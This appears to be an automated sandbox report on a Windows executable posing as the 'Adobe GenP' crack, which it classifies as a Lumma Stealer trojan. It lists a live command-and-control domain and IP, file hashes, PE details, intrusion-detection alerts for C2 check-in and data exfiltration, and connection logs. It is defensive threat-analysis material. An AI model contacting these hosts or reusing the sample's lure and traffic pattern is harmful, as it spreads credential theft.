                                                                        https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refBitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://icyidentifysu.click/nFBitLockerToGo.exe, 00000003.00000003.2356694769.0000000003574000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477BitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://github.com/zloirock/core-js/blob/v3.20.3/LICENSEAdobe GenP 5.exefalse
                                                                              high
                                                                              https://icyidentifysu.click:443/apiBitLockerToGo.exe, 00000003.00000003.2609625535.000000000356A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2425451359.0000000005894000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2610591925.000000000356B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2379523620.0000000005889000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2609550259.0000000003568000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://icyidentifysu.click/YFBitLockerToGo.exe, 00000003.00000003.2356694769.0000000003574000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://support.mozilla.org/products/firefoxgro.allBitLockerToGo.exe, 00000003.00000003.2427246550.0000000005B33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  104.21.29.252
                                                                                  icyidentifysu.clickUnited States
                                                                                  13335CLOUDFLARENETUStrue
                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1580154
                                                                                  Start date and time:2024-12-24 02:55:10 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 5m 5s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:5
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:Adobe GenP 5.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@3/0@1/1
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 50%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 95%
                                                                                  • Number of executed functions: 31
                                                                                  • Number of non-executed functions: 89
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Execution Graph export aborted for target Adobe GenP 5.exe, PID 6000 because there are no executed function
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  TimeTypeDescription
                                                                                  20:56:31API Interceptor8x Sleep call for process: BitLockerToGo.exe modified
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  104.21.29.252http://sharing.hs-sites.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                  • sharing-exper-direct.com/
                                                                                  No context
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  CLOUDFLARENETUSiviewers.dllGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.195.241
                                                                                  Loader.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.145.201
                                                                                  Collapse.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.199.72
                                                                                  Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.48.1
                                                                                  AxoPac.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.184.241
                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.169.205
                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.96.6
                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.96.6
                                                                                  'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.169.205
                                                                                  setup.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.191.144
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  a0e9f5d64349fb13191bc781f81f42e1iviewers.dllGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.29.252
                                                                                  Loader.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.29.252
                                                                                  Collapse.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.29.252
                                                                                  Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 104.21.29.252
                                                                                  AxoPac.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.29.252
                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.29.252
                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.29.252
                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.29.252
                                                                                  'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.29.252
                                                                                  setup.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.29.252
                                                                                  No context
                                                                                  No created / dropped files found
                                                                                  File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Entropy (8bit):6.569633473475677
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:Adobe GenP 5.exe
                                                                                  File size:14'820'352 bytes
                                                                                  MD5:9cce9d11869e1568a959515cd688f1f9
                                                                                  SHA1:98e048ba68a2aa5b2640f768dea8a6c6a4eb060c
                                                                                  SHA256:8a83820f2b3d79812bf39f4171d7d70d44b4d7a137c0aa1603f7e195dfc5210f
                                                                                  SHA512:cb5caabe0fa3bb7cf87351ca04e87fbc02e28b538867cf181d66687de8be95a8ad46cae2f22dccc2ee04e7029d8b4b8251b49b017009f5ce6a7e58546a540147
                                                                                  SSDEEP:98304:AXtPdrxHwuf+HtWUOVZZB3wUi7cheilI1ei/sktpGJz5vo:Wnr+tWxjZBgUi74ktpGJz5
                                                                                  TLSH:42E68E50B6A7F8B5C25306F7044B0129B734EC8C6A148951F98CFA6CF7B2F65B4B2A35
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........................)..6......PN........U...@..........................`......g}....@................................
                                                                                  Icon Hash:0f42e0e8e4c040a0
                                                                                  Entrypoint:0x464e50
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:6
                                                                                  OS Version Minor:1
                                                                                  File Version Major:6
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:6
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:9cbefe68f395e67356e2a5d8d1b285c0
                                                                                  Instruction
                                                                                  jmp 00007F9B089B99C0h
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  mov ecx, dword ptr [esp+04h]
                                                                                  sub esp, 28h
                                                                                  mov dword ptr [esp+1Ch], ebx
                                                                                  mov dword ptr [esp+10h], ebp
                                                                                  mov dword ptr [esp+14h], esi
                                                                                  mov dword ptr [esp+18h], edi
                                                                                  mov esi, eax
                                                                                  mov edx, dword ptr fs:[00000014h]
                                                                                  cmp edx, 00000000h
                                                                                  jne 00007F9B089BBCF9h
                                                                                  mov eax, 00000000h
                                                                                  jmp 00007F9B089BBD56h
                                                                                  mov edx, dword ptr [edx+00000000h]
                                                                                  cmp edx, 00000000h
                                                                                  jne 00007F9B089BBCF7h
                                                                                  call 00007F9B089BBDE9h
                                                                                  mov dword ptr [esp+20h], edx
                                                                                  mov dword ptr [esp+24h], esp
                                                                                  mov ebx, dword ptr [edx+18h]
                                                                                  mov ebx, dword ptr [ebx]
                                                                                  cmp edx, ebx
                                                                                  je 00007F9B089BBD0Ah
                                                                                  mov ebp, dword ptr fs:[00000014h]
                                                                                  mov dword ptr [ebp+00000000h], ebx
                                                                                  mov edi, dword ptr [ebx+1Ch]
                                                                                  sub edi, 28h
                                                                                  mov dword ptr [edi+24h], esp
                                                                                  mov esp, edi
                                                                                  mov ebx, dword ptr [ecx]
                                                                                  mov ecx, dword ptr [ecx+04h]
                                                                                  mov dword ptr [esp], ebx
                                                                                  mov dword ptr [esp+04h], ecx
                                                                                  mov dword ptr [esp+08h], edx
                                                                                  call esi
                                                                                  mov eax, dword ptr [esp+0Ch]
                                                                                  mov esp, dword ptr [esp+24h]
                                                                                  mov edx, dword ptr [esp+20h]
                                                                                  mov ebp, dword ptr fs:[00000014h]
                                                                                  mov dword ptr [ebp+00000000h], edx
                                                                                  mov edi, dword ptr [esp+18h]
                                                                                  mov esi, dword ptr [esp+14h]
                                                                                  mov ebp, dword ptr [esp+10h]
                                                                                  mov ebx, dword ptr [esp+1Ch]
                                                                                  add esp, 28h
                                                                                  retn 0004h
                                                                                  ret
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  mov ecx, dword ptr [esp+04h]
                                                                                  mov edx, dword ptr [ecx]
                                                                                  mov eax, esp
                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xdf00000x3dc.idata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xe140000x412a0.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xdf10000x21ac0.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x5606600xa0.data
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x29f5450x29f600f14e48f7a797fa1bbe4f3f0e2f6d94b1unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x2a10000x2bd1fc0x2bd200eb579c62a5b1d2909ba79696bedddf45unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0x55f0000x8902280x862200286aa978e6ebb31fef951f56b98a82d4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .idata0xdf00000x3dc0x4002a3e82e76cbe9aa150cbc3daef96d04eFalse0.4873046875data4.597883782143737IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .reloc0xdf10000x21ac00x21c00be2139855029bfc5b05153ff9dc7f084False0.5820384837962963data6.630531076404684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  .symtab0xe130000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  .rsrc0xe140000x412a00x41400898e3bcb4e48ddc3e11daa3de7454f65False0.3349459710249042data5.36012129893166IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_ICON0xe141840x40768Device independent bitmap graphic, 256 x 500 x 32, image size 2560000.3333320708983487
                                                                                  RT_GROUP_ICON0xe548ec0x14data1.2
                                                                                  RT_VERSION0xe549000x374data0.43891402714932126
                                                                                  RT_MANIFEST0xe54c740x62cXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4240506329113924
                                                                                  DLLImport
                                                                                  kernel32.dllWriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, PostQueuedCompletionStatus, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler
                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishUnited States
                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-12-24T02:56:31.907057+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549725104.21.29.252443TCP
                                                                                  2024-12-24T02:56:33.011243+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549725104.21.29.252443TCP
                                                                                  2024-12-24T02:56:33.011243+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549725104.21.29.252443TCP
                                                                                  2024-12-24T02:56:34.245323+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549736104.21.29.252443TCP
                                                                                  2024-12-24T02:56:35.029159+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549736104.21.29.252443TCP
                                                                                  2024-12-24T02:56:35.029159+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549736104.21.29.252443TCP
                                                                                  2024-12-24T02:56:36.612569+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549742104.21.29.252443TCP
                                                                                  2024-12-24T02:56:37.510301+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549742104.21.29.252443TCP
                                                                                  2024-12-24T02:56:39.234144+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549748104.21.29.252443TCP
                                                                                  2024-12-24T02:56:43.540784+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549759104.21.29.252443TCP
                                                                                  2024-12-24T02:56:46.356781+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549765104.21.29.252443TCP
                                                                                  2024-12-24T02:56:48.876162+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549771104.21.29.252443TCP
                                                                                  2024-12-24T02:56:52.541408+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549781104.21.29.252443TCP
                                                                                  2024-12-24T02:57:00.470768+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549781104.21.29.252443TCP
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Dec 24, 2024 02:56:30.689531088 CET49725443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:30.689578056 CET44349725104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:30.689654112 CET49725443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:30.690819025 CET49725443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:30.690835953 CET44349725104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:31.906970024 CET44349725104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:31.907057047 CET49725443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:31.931040049 CET49725443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:31.931058884 CET44349725104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:31.931257010 CET44349725104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:31.972542048 CET49725443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:32.265635967 CET49725443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:32.265672922 CET49725443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:32.265707016 CET44349725104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:33.011248112 CET44349725104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:33.011318922 CET44349725104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:33.011445045 CET49725443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:33.016627073 CET49725443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:33.016640902 CET44349725104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:33.031878948 CET49736443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:33.031905890 CET44349736104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:33.032005072 CET49736443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:33.032958031 CET49736443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:33.032982111 CET44349736104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:34.245105982 CET44349736104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:34.245322943 CET49736443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:34.246635914 CET49736443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:34.246644974 CET44349736104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:34.246968985 CET44349736104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:34.248270035 CET49736443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:34.248296022 CET49736443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:34.248343945 CET44349736104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:35.029165983 CET44349736104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:35.029567957 CET44349736104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:35.029669046 CET49736443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:35.029731035 CET44349736104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:35.030335903 CET44349736104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:35.030487061 CET49736443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:35.030503035 CET44349736104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:35.039799929 CET44349736104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:35.039890051 CET49736443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:35.039906979 CET44349736104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:35.048103094 CET44349736104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:35.048151970 CET49736443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:35.048157930 CET44349736104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:35.097558022 CET49736443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:35.097574949 CET44349736104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:35.144407034 CET49736443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:35.148699999 CET44349736104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:35.191446066 CET49736443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:35.221069098 CET44349736104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:35.225117922 CET44349736104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:35.225270987 CET44349736104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:35.225302935 CET49736443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:35.225347042 CET44349736104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:35.225374937 CET44349736104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:35.225404978 CET49736443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:35.225436926 CET49736443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:35.225599051 CET49736443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:35.225629091 CET44349736104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:35.225652933 CET49736443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:35.225665092 CET44349736104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:35.397927999 CET49742443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:35.398044109 CET44349742104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:35.398135900 CET49742443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:35.398471117 CET49742443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:35.398508072 CET44349742104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:36.612453938 CET44349742104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:36.612569094 CET49742443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:36.614053011 CET49742443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:36.614065886 CET44349742104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:36.614389896 CET44349742104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:36.615530968 CET49742443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:36.615673065 CET49742443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:36.615710974 CET44349742104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:37.510270119 CET44349742104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:37.510373116 CET44349742104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:37.510437012 CET49742443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:37.513070107 CET49742443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:37.513103008 CET44349742104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:38.019917011 CET49748443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:38.020005941 CET44349748104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:38.020104885 CET49748443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:38.020440102 CET49748443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:38.020478010 CET44349748104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:39.234057903 CET44349748104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:39.234143972 CET49748443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:39.235305071 CET49748443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:39.235326052 CET44349748104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:39.235650063 CET44349748104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:39.236694098 CET49748443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:39.236852884 CET49748443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:39.236893892 CET44349748104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:39.236953974 CET49748443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:39.279382944 CET44349748104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:42.099302053 CET44349748104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:42.099406958 CET44349748104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:42.099466085 CET49748443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:42.101422071 CET49748443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:42.101454973 CET44349748104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:42.324596882 CET49759443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:42.324639082 CET44349759104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:42.324744940 CET49759443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:42.325206995 CET49759443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:42.325222015 CET44349759104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:43.540719032 CET44349759104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:43.540783882 CET49759443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:43.542107105 CET49759443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:43.542121887 CET44349759104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:43.542335033 CET44349759104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:43.543488026 CET49759443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:43.543678045 CET49759443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:43.543709040 CET44349759104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:43.543791056 CET49759443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:43.543811083 CET44349759104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:44.790678978 CET44349759104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:44.790766001 CET44349759104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:44.790911913 CET49759443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:44.791040897 CET49759443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:44.791055918 CET44349759104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:45.141987085 CET49765443192.168.2.5104.21.29.252
                                                                                  Dec 24, 2024 02:56:45.142081976 CET44349765104.21.29.252192.168.2.5
                                                                                  Dec 24, 2024 02:56:45.142167091 CET49765443192.168.2.5104.21.29.252
